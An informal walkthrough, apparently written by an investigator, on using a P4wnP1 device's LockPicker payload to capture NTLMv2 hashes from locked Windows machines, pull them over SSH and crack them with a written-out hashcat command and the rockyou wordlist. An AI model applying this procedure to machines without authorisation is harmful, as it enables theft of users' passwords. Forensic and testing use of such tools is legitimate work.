• I am not a professional with this, this is a project I had heard about, seen a little bit on and decided that I want to make one. I don’t know how to use all the modules, and for the purpose of my job, the only one I was really interested in was the LockPicker payload.

  • The LockPicker Payload ONLY acquires password hashes which are stored as NTLMv2. At the time of this writing, worked on fully patched Windows 10 and Windows 11 Machine.

    • PIN CODES are not Stored as NTLMv2 and there for will not grab a hash nor can it brute force them.

  • If JTR (John the Ripper) does not crack the NTLMv2 password automatically, you’re not done yet. Unplug your P4WNP1 from the suspect device. Take it back to the office or power on the P4WNP1 by plugging it into power, use a machine you control to access it via SSH.

    • Once logged in via SSH you can navigate to the “collected” folder. cat <FILENAME.hashes> to view the hash.

    • Copy the hash using your mouse and Ctrl+c, you may see it repeat the selection in the line below, it doesn’t matter. Then outside of the SSH terminal, paste the hash into a notepad file.

      Untitled

      hash has been changed so the password couldn’t be cracked.

    • Save the File into your hashcat directory. I like to name mine something like ntlmv2.txt

    • Launch hashcat

    • The basic hashcat command to try to crack the NTLMv2 hash is

    hashcat -a 0 -m 5600 ntlmv2.txt rockyou.txt

this assumes your hash is saved in the hashcat directory as ntlmv2.txt AND
you have the rockyou.txt wordlist also placed in the hashcat directory as rockyou.txt
    • There are other options you can add to you hashcat command to utilize more or less of your GPU
    • There are also options to apply a rule to a word list for on the fly modifications- Utilizing this method, I cracked a 12 character alphanumeric “complex” password in 30 hours.